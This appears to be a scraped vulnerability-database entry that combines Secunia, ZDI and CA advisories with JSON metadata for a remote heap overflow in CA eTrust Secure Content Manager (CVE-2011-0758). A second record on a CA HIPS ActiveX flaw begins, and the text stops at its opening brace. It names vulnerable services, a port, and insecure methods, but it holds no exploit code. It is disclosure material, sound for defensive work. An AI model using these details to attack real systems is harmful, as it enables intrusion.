DESCRIPTION: A vulnerability has been reported in CA Secure Content Manager, which can be exploited by malicious people to compromise a vulnerable system.
The vulnerability is caused due to missing input validation in the eTrust Common Services Transport (ECSQdmn.exe) service when parsing requests and can be exploited to cause a heap-based buffer overflow via a specially crafted request sent to port 1882. * CA Gateway Security version 8.1.
SOLUTION: Restrict access to the affected service.
PROVIDED AND/OR DISCOVERED BY: Sebastian Apelt via ZDI.
ORIGINAL ADVISORY: ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-059/
CA: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={EE6F16E1-6E05-4890-A739-2B9F745C721F}
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. ZDI-11-059: CA ETrust Secure Content Manager Common Services Transport Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-059
February 7, 2011 - This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 180 day deadline. To view mitigations for this vulnerability please see: http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-ca
-- CVE ID: CVE-2011-0758
-- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)
-- Affected Vendors: CA
-- Affected Products: CA eTrust Secure Content Manager
-- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6184. Authentication is not required to exploit this vulnerability.
-- Disclosure Timeline: 2008-05-23 - Vulnerability reported to vendor 2011-02-07 - Public release of advisory
-- Credit: This vulnerability was discovered by: * Sebastian Apelt (sebastian.apelt@siberas.de)
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "etrust secure content manager",
"scope": "eq",
"trust": 2.4,
"vendor": "ca",
"version": "8.0"
},
{
"_id": null,
"model": "gateway security",
"scope": "eq",
"trust": 2.4,
"vendor": "ca",
"version": "8.1"
},
{
"_id": null,
"model": "etrust secure content manager",
"scope": null,
"trust": 0.7,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"_id": null,
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"_id": null,
"model": "associates etrust secure content manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"_id": null,
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"_id": null,
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-059"
},
{
"db": "BID",
"id": "46253"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-129"
},
{
"db": "NVD",
"id": "CVE-2011-0758"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:etrust_secure_content_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:gateway_security",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
}
]
},
"credits": {
"_id": null,
"data": "Sebastian Apelt (sebastian.apelt@siberas.de)",
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-059"
}
],
"trust": 0.7
},
"cve": "CVE-2011-0758",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2011-0758",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 2.5,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-48703",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2011-0758",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2011-0758",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2011-0758",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201102-129",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-48703",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-059"
},
{
"db": "VULHUB",
"id": "VHN-48703"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-129"
},
{
"db": "NVD",
"id": "CVE-2011-0758"
}
]
},
"description": {
"_id": null,
"data": "The eCS component (ECSQdmn.exe) in CA ETrust Secure Content Manager 8.0 and CA Gateway Security 8.1 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a crafted request to port 1882, involving an incorrect integer calculation and a heap-based buffer overflow. This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Computer Associates eTrust Secure Content Manager. Authentication is not required to exploit this vulnerability.The specific flaw exists in the eTrust Common Services Transport (ECSQdmn.exe) running on port 1882. When making a request to this service a user supplied DWORD value is used in a memory copy operation. Due to the lack of bounds checking an integer can be improperly calculated leading to a heap overflow. If successfully exploited this vulnerability will result in a remote system compromise with SYSTEM credentials. Failed exploit attempts will result in a denial-of-service condition. ----------------------------------------------------------------------\n\n\nGet a tax break on purchases of Secunia Solutions!\n\nIf you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:\nhttp://secunia.com/products/corporate/vim/section_179/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Secure Content Manager Common Services Transport Vulnerability\n\nSECUNIA ADVISORY ID:\nSA43200\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/43200/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43200\n\nRELEASE DATE:\n2011-02-10\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/43200/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/43200/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43200\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in CA Secure Content Manager, which\ncan be exploited by malicious people to compromise a vulnerable\nsystem. \n\nThe vulnerability is caused due to missing input validation in the\neTrust Common Services Transport (ECSQdmn.exe) service when parsing\nrequests and can be exploited to cause a heap-based buffer overflow\nvia a specially crafted request sent to port 1882. \n* CA Gateway Security version 8.1. \n\nSOLUTION:\nRestrict access to the affected service. \n\nPROVIDED AND/OR DISCOVERED BY:\nSebastian Apelt via ZDI. \n\nORIGINAL ADVISORY:\nZDI:\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-059/\n\nCA:\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={EE6F16E1-6E05-4890-A739-2B9F745C721F}\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. ZDI-11-059: CA ETrust Secure Content Manager Common Services Transport Remote Code Execution Vulnerability\n\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-059\n\nFebruary 7, 2011 - This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 180 day deadline. To view mitigations for this vulnerability please see: http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-ca\n\n-- CVE ID:\nCVE-2011-0758\n\n-- CVSS:\n10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n-- Affected Vendors:\nCA\n\n-- Affected Products:\nCA eTrust Secure Content Manager\n\n-- TippingPoint(TM) IPS Customer Protection:\nTippingPoint IPS customers have been protected against this\nvulnerability by Digital Vaccine protection filter ID 6184. Authentication is not required to exploit this vulnerability. \n\n-- Disclosure Timeline:\n2008-05-23 - Vulnerability reported to vendor\n2011-02-07 - Public release of advisory\n\n-- Credit:\nThis vulnerability was discovered by:\n * Sebastian Apelt (sebastian.apelt@siberas.de)\n\n-- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. TippingPoint does not re-sell the vulnerability details or any\nexploit code. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n http://twitter.com/thezdi\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-0758"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
},
{
"db": "ZDI",
"id": "ZDI-11-059"
},
{
"db": "BID",
"id": "46253"
},
{
"db": "VULHUB",
"id": "VHN-48703"
},
{
"db": "PACKETSTORM",
"id": "98339"
},
{
"db": "PACKETSTORM",
"id": "98243"
}
],
"trust": 2.79
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-48703",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-48703"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2011-0758",
"trust": 3.6
},
{
"db": "ZDI",
"id": "ZDI-11-059",
"trust": 2.6
},
{
"db": "BID",
"id": "46253",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "43200",
"trust": 1.9
},
{
"db": "VUPEN",
"id": "ADV-2011-0306",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "70840",
"trust": 1.1
},
{
"db": "SREASON",
"id": "8075",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1025052",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-342",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201102-129",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20110207 ZDI-11-059: CA ETRUST SECURE CONTENT MANAGER COMMON SERVICES TRANSPORT REMOTE CODE EXECUTION VULNERABILITY",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "98243",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-48703",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "98339",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-059"
},
{
"db": "VULHUB",
"id": "VHN-48703"
},
{
"db": "BID",
"id": "46253"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
},
{
"db": "PACKETSTORM",
"id": "98339"
},
{
"db": "PACKETSTORM",
"id": "98243"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-129"
},
{
"db": "NVD",
"id": "CVE-2011-0758"
}
]
},
"id": "VAR-201102-0158",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-48703"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-11T23:12:11.343000Z",
"patch": {
"_id": null,
"data": [
{
"title": "CA20110208-01: Security Advisory for CA Secure Content Manager, Gateway Security",
"trust": 0.8,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=%7BEE6F16E1-6E05-4890-A739-2B9F745C721F%7D"
},
{
"title": "CA has issued an update to correct this vulnerability.{EE6F16E1-6E05-4890-A739-2B9F745C721F}",
"trust": 0.7,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID="
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-059"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-189",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-48703"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
},
{
"db": "NVD",
"id": "CVE-2011-0758"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.1,
"url": "http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-ca"
},
{
"trust": 1.8,
"url": "http://www.zerodayinitiative.com/advisories/zdi-11-059"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/46253"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/43200"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2011/0306"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/516277/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=%7bee6f16e1-6e05-4890-a739-2b9f745c721f%7d"
},
{
"trust": 1.1,
"url": "http://osvdb.org/70840"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id?1025052"
},
{
"trust": 1.1,
"url": "http://securityreason.com/securityalert/8075"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0758"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-0758"
},
{
"trust": 0.7,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid="
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/516277/100/0/threaded"
},
{
"trust": 0.3,
"url": " http://www.ca.com/us/products/product.aspx?id=4673"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid={ee6f16e1-6e05-4890-a739-2b9f745c721f}"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/vim/section_179/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-11-059/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43200"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43200/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43200/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
},
{
"trust": 0.1,
"url": "http://secunia.com/"
},
{
"trust": 0.1,
"url": "http://twitter.com/thezdi"
},
{
"trust": 0.1,
"url": "http://www.tippingpoint.com"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-0758"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-059"
},
{
"db": "VULHUB",
"id": "VHN-48703"
},
{
"db": "BID",
"id": "46253"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
},
{
"db": "PACKETSTORM",
"id": "98339"
},
{
"db": "PACKETSTORM",
"id": "98243"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-129"
},
{
"db": "NVD",
"id": "CVE-2011-0758"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "ZDI",
"id": "ZDI-11-059",
"ident": null
},
{
"db": "VULHUB",
"id": "VHN-48703",
"ident": null
},
{
"db": "BID",
"id": "46253",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004240",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "98339",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "98243",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201102-129",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2011-0758",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2011-02-07T00:00:00",
"db": "ZDI",
"id": "ZDI-11-059",
"ident": null
},
{
"date": "2011-02-10T00:00:00",
"db": "VULHUB",
"id": "VHN-48703",
"ident": null
},
{
"date": "2011-02-07T00:00:00",
"db": "BID",
"id": "46253",
"ident": null
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-004240",
"ident": null
},
{
"date": "2011-02-09T09:16:47",
"db": "PACKETSTORM",
"id": "98339",
"ident": null
},
{
"date": "2011-02-07T20:31:00",
"db": "PACKETSTORM",
"id": "98243",
"ident": null
},
{
"date": "2011-02-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201102-129",
"ident": null
},
{
"date": "2011-02-10T18:00:59.130000",
"db": "NVD",
"id": "CVE-2011-0758",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2011-02-07T00:00:00",
"db": "ZDI",
"id": "ZDI-11-059",
"ident": null
},
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-48703",
"ident": null
},
{
"date": "2011-02-07T00:00:00",
"db": "BID",
"id": "46253",
"ident": null
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-004240",
"ident": null
},
{
"date": "2011-07-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201102-129",
"ident": null
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2011-0758",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "98243"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-129"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "CA ETrust Secure Content Manager and CA Gateway Securit of eCS In the component Service operation interruption (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-004240"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "digital error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201102-129"
}
],
"trust": 0.6
}
}
VAR-201102-0367
Vulnerability from variot - Updated: 2025-04-11 23:10The XML Security Database Parser class in the XMLSecDB ActiveX control in the HIPSEngine component in the Management Server before 8.1.0.88, and the client before 1.6.450, in CA Host-Based Intrusion Prevention System (HIPS) 8.1, as used in CA Internet Security Suite (ISS) 2010, allows remote attackers to download an arbitrary program onto a client machine, and execute this program, via vectors involving the SetXml and Save methods. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The flaw exists within the XMLSecDB ActiveX control which is installed with HIPSEngine component. SetXml and Save methods are implemented insecurely and can allow creation of an arbitrary file on the victim's system. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the user. CA Host-Based Intrusion Prevention System(HIPS) is prone to a remote code-execution vulnerability. Failed exploits result in denial-of-service conditions. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/
TITLE: CA Host-Based Intrusion Prevention System "XMLSecDB.DIParser" ActiveX Control Vulnerability
SECUNIA ADVISORY ID: SA43377
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43377/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43377
RELEASE DATE: 2011-03-13
DISCUSS ADVISORY: http://secunia.com/advisories/43377/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/43377/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43377
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been discovered in CA Host-Based Intrusion Prevention System, which can be exploited by malicious people to compromise a user's system. This can be exploited to create an arbitrary file using directory traversal specifiers and supply controlled content via the "SetXml()" method.
The vulnerability is confirmed in UmxXmlSd version 1.5.0.263 and reported in the following products: * HIPS Management Server versions prior to 8.1.0.88.
SOLUTION: Apply RO26950 and set registry values. Please see the vendor's advisory for more details.
Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY: Andrea Micalizzi aka rgod via ZDI
Additional details provided by Secunia Research.
ORIGINAL ADVISORY: CA (CA20110223-01): https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={53A608DF-BFDB-4AB3-A98F-E4BB6BC7A2F4}
ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-093/
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
CA20110223-01: Security Notice for CA Host-Based Intrusion Prevention System
Issued: February 23, 2011 Updated: February 24, 2011
CA Technologies support is alerting customers to a security risk associated with CA Host-Based Intrusion Prevention System (HIPS). CA Technologies has issued patches to address the vulnerability.
The vulnerability, CVE-2011-1036, is due to insecure method implementation in the XMLSecDB ActiveX control that is utilized in CA HIPS components and products.
HIPS client sources are vulnerable if the build number is less than 1.6.450.
Older versions of HIPS and ISS, that are no longer supported, may also be vulnerable.
Solution
CA has issued the following patches to address the vulnerability. You do not need to restart the client.
CA Internet Security Suite (ISS) 2010: Fix information will be published soon.
CA Internet Security Suite (ISS) 2011: Fix information will be published soon.
References
CVE-2011-1036 - CA HIPS XMLSecDB ActiveX control insecure methods
Acknowledgement
Andrea Micalizzi aka rgod, via TippingPoint ZDI
Change History
Version 1.0: Initial Release Version 1.5: Added ISS 2011 to list of affected products. Added instructions for determining if ISS is affected.
If additional information is required, please contact CA Technologies Support at https://support.ca.com.
If you discover a vulnerability in a CA Technologies product, please report your findings to the CA Technologies Product Vulnerability Response Team. support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Thanks and regards, Ken Williams, Director ca technologies Product Vulnerability Response Team ca technologies Business Unit Operations wilja22@ca.com
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.9.1 (Build 287) Charset: utf-8
wj8DBQFNZypeeSWR3+KUGYURAmbuAJ9tD5x666uOpX6ia6ksu4rdnksyggCfSwCn kb1ylRiLIRzRg3j1VygjImQ= =M+5z -----END PGP SIGNATURE----- . More details can be found at:
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={53A608DF-BFDB-4AB3-A98F-E4BB6BC7A2F4}
-- Disclosure Timeline: 2010-08-25 - Vulnerability reported to vendor 2011-02-23 - Coordinated public release of advisory
-- Credit: This vulnerability was discovered by: * Andrea Micalizzi aka rgod
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Show details on source website{
"@context": {
